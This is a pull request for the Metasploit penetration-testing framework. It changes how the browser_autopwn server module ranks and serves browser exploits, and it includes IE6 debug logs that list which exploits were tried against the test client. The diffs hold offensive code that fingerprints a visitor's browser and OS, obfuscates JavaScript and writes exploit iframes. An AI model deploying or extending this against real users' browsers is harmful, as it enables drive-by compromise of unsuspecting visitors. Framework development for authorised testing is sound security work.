### PR TITLE
browser_autopwn exploit ordering updates (Bug #7253)

### DIFF
--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -387,6 +387,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		@js_tests = {}
 		@noscript_tests = {}
+		@all_tests = {}
 
 		print_line
 		print_status("Starting exploit modules on host #{@lhost}...")
@@ -446,20 +447,24 @@ class Metasploit3 < Msf::Auxiliary
 			end
 
 			# Now that we've got all of our exploit tests put together,
-			# organize them into requires-scripting and
-			# doesnt-require-scripting, sorted by browser name.
+			# organize them into an all tests (JS and no-JS), organized by rank, 
+			# and doesnt-require-scripting (no-JS), organized by browser name.
 			if apo[:javascript] && apo[:ua_name]
-				@js_tests[apo[:ua_name]] ||= []
-				@js_tests[apo[:ua_name]].push(apo)
+				@all_tests[apo[:rank]] ||= []
+				@all_tests[apo[:rank]].push(apo)
 			elsif apo[:javascript]
-				@js_tests["generic"] ||= []
-				@js_tests["generic"].push(apo)
+				@all_tests[apo[:rank]] ||= []
+				@all_tests[apo[:rank]].push(apo)
 			elsif apo[:ua_name]
 				@noscript_tests[apo[:ua_name]] ||= []
 				@noscript_tests[apo[:ua_name]].push(apo)
+				@all_tests[apo[:rank]] ||= []
+				@all_tests[apo[:rank]].push(apo)
 			else
 				@noscript_tests["generic"] ||= []
 				@noscript_tests["generic"].push(apo)
+				@all_tests[apo[:rank]] ||= []
+				@all_tests[apo[:rank]].push(apo)
 			end
 		end
 
@@ -496,22 +501,19 @@ class Metasploit3 < Msf::Auxiliary
 		# let the handlers get set up
 		Rex::ThreadSafe.sleep(0.5)
 
-		print_line
 		print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
 		print_line
 
 		# Sort the tests by reliability, descending.
-		@js_tests.each { |browser,tests|
-			tests.sort! {|a,b| b[:rank] <=> a[:rank]}
-		}
-
+		# I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
+		@all_tests = @all_tests.sort.reverse
+	
 		# This matters a lot less for noscript exploits since they basically
 		# get thrown into a big pile of iframes that the browser will load
 		# semi-concurrently.  Still, might as well.
 		@noscript_tests.each { |browser,tests|
 			tests.sort! {|a,b| b[:rank] <=> a[:rank]}
 		}
-
 	end
 
 	#
@@ -746,45 +748,64 @@ class Metasploit3 < Msf::Auxiliary
 		# if we have no client_info, this will add all tests. Otherwise tries
 		# to only send tests for exploits that target the client's detected
 		# browser.
-		@js_tests.each { |browser, sploits|
-			next unless client_matches_browser(client_info, browser)
-
-			# Send all the generics regardless of what the client is. If the
-			# client is nil, then we don't know what it really is, so just err
-			# on the side of shells and send everything. Otherwise, send only
-			# if the client is using the browser associated with this set of
-			# exploits.
-			if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
-				sploits.each do |s|
-					if s[:vuln_test].nil? or s[:vuln_test].empty?
-						test = "is_vuln = true"
-					else
-						# get rid of newlines and escape quotes
-						test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
-					end
-					# shouldn't be any in the resource, but just in case...
-					res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
-
-					# Skip exploits that don't match the client's OS.
-					if (host_info and host_info[:os_name] and s[:os_name])
-						# Reject exploits whose OS doesn't match that of the
-						# victim. Note that host_info comes from javascript OS
-						# detection, NOT the database.
-						if host_info[:os_name] != "undefined"
-							unless s[:os_name].include?(host_info[:os_name])
-								vprint_status("Rejecting #{s[:name]} for non-matching OS")
-								next
+		
+		@all_tests.each { |rank, sploits|
+			sploits.each { |s|
+				browser = s[:ua_name]
+				next unless client_matches_browser(client_info, browser)
+				
+				# Send all the generics regardless of what the client is. If the
+				# client is nil, then we don't know what it really is, so just err
+				# on the side of shells and send everything. Otherwise, send only
+				# if the client is using the browser associated with this set of
+				# exploits.
+				if s[:javascript]
+					if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
+						if s[:vuln_test].nil? or s[:vuln_test].empty?
+							test = "is_vuln = true"
+						else
+							# get rid of newlines and escape quotes
+							test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
+						end
+						# shouldn't be any in the resource, but just in case...
+						res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
+	
+						# Skip exploits that don't match the client's OS.
+						if (host_info and host_info[:os_name] and s[:os_name])
+							# Reject exploits whose OS doesn't match that of the
+							# victim. Note that host_info comes from javascript OS
+							# detection, NOT the database.
+							if host_info[:os_name] != "undefined"
+								unless s[:os_name].include?(host_info[:os_name])
+									vprint_status("Rejecting #{s[:name]} for non-matching OS")
+									next
+								end
 							end
 						end
+
+						js << "global_exploit_list[global_exploit_list.length] = {\n"
+						js << "  'test':'#{test}',\n"
+						js << "  'resource':'#{res}'\n"
+						js << "};\n"
+						sploits_for_this_client.push s[:name]
+						sploit_cnt += 1
 					end
-					js << "global_exploit_list[global_exploit_list.length] = {\n"
-					js << "  'test':'#{test}',\n"
-					js << "  'resource':'#{res}'\n"
-					js << "};\n"
+				else
+					if s[:name] =~ %r|/java_|
+						res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
+						js << "global_exploit_list[global_exploit_list.length] = {\n"
+						js << "  'test':'is_vuln = navigator.javaEnabled()',\n"
+						js << "  'resource':'#{res}'\n"
+						js << "};\n"
+					else
+						# Some other kind of exploit that we can't generically
+						# check for in javascript, throw it on the pile.
+						noscript_html << html_for_exploit(s, client_info)
+					end
 					sploits_for_this_client.push s[:name]
 					sploit_cnt += 1
 				end
-			end
+			}
 		}
 
 		# Add a javaEnabled() test specifically for java exploits.  Other
@@ -792,36 +813,36 @@ class Metasploit3 < Msf::Auxiliary
 		# that will be dumped out after other exploitation is done, assuming
 		# the browser didn't stop somewhere along the way due to a successful
 		# exploit or a crash from all the memory raping we just did.
-		noscript_html = ""
-		@noscript_tests.each { |browser, sploits|
-			sploits.each do |s|
-				if s[:name] =~ %r|/java_|
-					res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
-					js << "global_exploit_list[global_exploit_list.length] = {\n"
-					js << "  'test':'is_vuln = navigator.javaEnabled()',\n"
-					js << "  'resource':'#{res}'\n"
-					js << "};\n"
-				else
+		#noscript_html = ""
+		#@noscript_tests.each { |browser, sploits|
+		#	sploits.each do |s|
+		#		if s[:name] =~ %r|/java_|
+		#			res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
+		#			js << "global_exploit_list[global_exploit_list.length] = {\n"
+		#			js << "  'test':'is_vuln = navigator.javaEnabled()',\n"
+		#			js << "  'resource':'#{res}'\n"
+		#			js << "};\n"
+		#		else
 					# Some other kind of exploit that we can't generically
 					# check for in javascript, throw it on the pile.
-					noscript_html << html_for_exploit(s, client_info)
-				end
-				sploits_for_this_client.push s[:name]
-				sploit_cnt += 1
-			end
-		}
+		#			noscript_html << html_for_exploit(s, client_info)
+		#		end
+		#		sploits_for_this_client.push s[:name]
+		#		sploit_cnt += 1
+		#	end
+		#}
 
 		# If all of our exploits that require javascript fail, try to continue
 		# with those that don't
-		js << %Q|var noscript_exploits = "|
-		js << Rex::Text.to_hex(noscript_html, "%")
-		js << %Q|";\n|
-		js << %Q|var noscript_div = document.createElement("div");\n|
+		#js << %Q|var noscript_exploits = "|
+		#js << Rex::Text.to_hex(noscript_html, "%")
+		#js << %Q|";\n|
+		#js << %Q|var noscript_div = document.createElement("div");\n|
 		# Have to use innerHTML here to render the new iframes. Using
 		# document.createElement and appendChild() will escape all the
 		# entities.
-		js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
-		js << %Q|document.body.appendChild(noscript_div);\n|
+		#js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
+		#js << %Q|document.body.appendChild(noscript_div);\n|
 
 		js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
 		js << "window.next_exploit(0);\n"
@@ -830,7 +851,6 @@ class Metasploit3 < Msf::Auxiliary
 		js.obfuscate unless datastore["DEBUG"]
 
 		response.body = "#{js}"
-
 		print_status("Responding with #{sploit_cnt} exploits")
 		sploits_for_this_client.each do |name|
 			vprint_status("* #{name}")

--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -760,7 +760,7 @@ class Metasploit3 < Msf::Auxiliary
 				# if the client is using the browser associated with this set of
 				# exploits.
 				if s[:javascript]
-					if (browser == "generic" || client_info.nil? || [nil, s[:ua_name]].include?(client_info[:ua_name]))
+					if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
 						if s[:vuln_test].nil? or s[:vuln_test].empty?
 							test = "is_vuln = true"
 						else

--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -385,7 +385,6 @@ class Metasploit3 < Msf::Auxiliary
 	def start_exploit_modules()
 		@lhost = (datastore['LHOST'] || "0.0.0.0")
 
-		@js_tests = {}
 		@noscript_tests = {}
 		@all_tests = {}
 
@@ -501,6 +500,7 @@ class Metasploit3 < Msf::Auxiliary
 		# let the handlers get set up
 		Rex::ThreadSafe.sleep(0.5)
 
+		print_line
 		print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
 		print_line
 
@@ -807,42 +807,6 @@ class Metasploit3 < Msf::Auxiliary
 				end
 			}
 		}
-
-		# Add a javaEnabled() test specifically for java exploits.  Other
-		# exploits that don't require javascript go into a big pile of iframes
-		# that will be dumped out after other exploitation is done, assuming
-		# the browser didn't stop somewhere along the way due to a successful
-		# exploit or a crash from all the memory raping we just did.
-		#noscript_html = ""
-		#@noscript_tests.each { |browser, sploits|
-		#	sploits.each do |s|
-		#		if s[:name] =~ %r|/java_|
-		#			res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
-		#			js << "global_exploit_list[global_exploit_list.length] = {\n"
-		#			js << "  'test':'is_vuln = navigator.javaEnabled()',\n"
-		#			js << "  'resource':'#{res}'\n"
-		#			js << "};\n"
-		#		else
-					# Some other kind of exploit that we can't generically
-					# check for in javascript, throw it on the pile.
-		#			noscript_html << html_for_exploit(s, client_info)
-		#		end
-		#		sploits_for_this_client.push s[:name]
-		#		sploit_cnt += 1
-		#	end
-		#}
-
-		# If all of our exploits that require javascript fail, try to continue
-		# with those that don't
-		#js << %Q|var noscript_exploits = "|
-		#js << Rex::Text.to_hex(noscript_html, "%")
-		#js << %Q|";\n|
-		#js << %Q|var noscript_div = document.createElement("div");\n|
-		# Have to use innerHTML here to render the new iframes. Using
-		# document.createElement and appendChild() will escape all the
-		# entities.
-		#js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
-		#js << %Q|document.body.appendChild(noscript_div);\n|
 
 		js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
 		js << "window.next_exploit(0);\n"

--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -751,7 +751,7 @@ class Metasploit3 < Msf::Auxiliary
 		
 		@all_tests.each { |rank, sploits|
 			sploits.each { |s|
-				browser = s[:ua_name]
+				browser = s[:ua_name] || "generic"
 				next unless client_matches_browser(client_info, browser)
 				
 				# Send all the generics regardless of what the client is. If the
@@ -760,7 +760,7 @@ class Metasploit3 < Msf::Auxiliary
 				# if the client is using the browser associated with this set of
 				# exploits.
 				if s[:javascript]
-					if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
+					if (browser == "generic" || client_info.nil? || [nil, s[:ua_name]].include?(client_info[:ua_name]))
 						if s[:vuln_test].nil? or s[:vuln_test].empty?
 							test = "is_vuln = true"
 						else


### PR DESCRIPTION
Updates to how browser_autopwn chooses exploits related to:
http://dev.metasploit.com/redmine/issues/7253

Results in higher ranked exploits being attempted before less stable low ranked exploits, regardless of status as a JS or non-JS related exploit.

I essentially placed JS and non-JS exploits into a single list (instead of the JS only list), ordered by exploit rank. If javascript is detected, this list is iterated through from highest exploit ranks to lowest and appropriate output written. When javascript support is not present, nothing changes from the past.

I have tested with clients connecting from OSX (Chrome), Ubuntu (Chrome and Firefox) and Windows XP (IE6,IE7,IE10), verifying exploit count and the fixed exploit order between pre-change and post-change versions of browser_autopwn (using debug to follow through on the client side).

Example of testing from IE6 in Windows:

**Original Version:**
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)

os_name Microsoft Windows
os_flavor XP
os_sp undefined
os_lang en-us
arch x86
ua_name MSIE
ua_version 7.0

starting exploits (42 total)
next_exploit(0)
trying /windows/browser/ie_createobject of 42
this client does not appear to be vulnerable to /windows/browser/ie_createobject
next_exploit(1)
trying /windows/browser/ms10_018_ie_behaviors of 42
test says it is vuln, writing iframe for /windows/browser/ms10_018_ie_behaviors
next_exploit(2)
trying /windows/browser/ms11_003_ie_css_import of 42
this client does not appear to be vulnerable to /windows/browser/ms11_003_ie_css_import
....
trying /multi/browser/java_jre17_method_handle of 42
test says it is vuln, writing iframe for /multi/browser/java_jre17_method_handle
next_exploit(40)
trying /multi/browser/java_rhino of 42
test says it is vuln, writing iframe for /multi/browser/java_rhino
next_exploit(41)
trying /multi/browser/java_verifier_field_access of 42
test says it is vuln, writing iframe for /multi/browser/java_verifier_field_access
next_exploit(42)
End

**New Version:**
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)

os_name Microsoft Windows
os_flavor XP
os_sp undefined
os_lang en-us
arch x86
ua_name MSIE
ua_version 7.0

starting exploits (42 total)
next_exploit(0)
trying /multi/browser/java_atomicreferencearray of 42
test says it is vuln, writing iframe for /multi/browser/java_atomicreferencearray
next_exploit(1)
trying /multi/browser/java_jre17_exec of 42
test says it is vuln, writing iframe for /multi/browser/java_jre17_exec
next_exploit(2)
trying /multi/browser/java_jre17_glassfish_averagerangestatisticimpl of 42
test says it is vuln, writing iframe for /multi/browser/java_jre17_glassfish_averagerangestatisticimpl
next_exploit(3)
...
trying /windows/browser/tom_sawyer_tsgetx71ex552 of 42
test threw an exception: Syntax error
next_exploit(40)
trying /windows/browser/winzip_fileview of 42
test threw an exception: Syntax error
next_exploit(41)
trying /windows/browser/wmi_admintools of 42
test says it is vuln, writing iframe for /windows/browser/wmi_admintools
next_exploit(42)
End
